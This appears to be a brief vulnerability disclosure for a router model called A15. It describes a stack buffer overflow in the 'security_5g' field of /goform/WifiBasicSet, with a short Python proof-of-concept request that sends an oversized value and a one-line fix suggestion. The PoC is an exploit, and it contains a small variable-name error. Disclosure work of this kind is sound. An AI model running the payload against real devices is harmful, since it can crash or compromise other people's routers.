We found a stack buffer overflow vulnerability at **A15 (**Firmware version V15.13.07.13).

Untitled

Untitled

In the handler function for action /goform/WifiBasicSet, the user-controlled string “security_5g” is copied to a stack buffer param_5g without size check, resulting in buffer overflow.

POC

import requests

cookie = {"Cookie":"uid=1234"}

url1 = "<http://192.168.17.221:80/goform/WifiBasicSet>"
data1 = {"security_5g" : "a"*(0x1000)}
response = requests.post(url1, cookies=cookie, data=data)

print(response.text)
print(response)

Fix Suggestion

Use strncpy to avoid buffer overflow.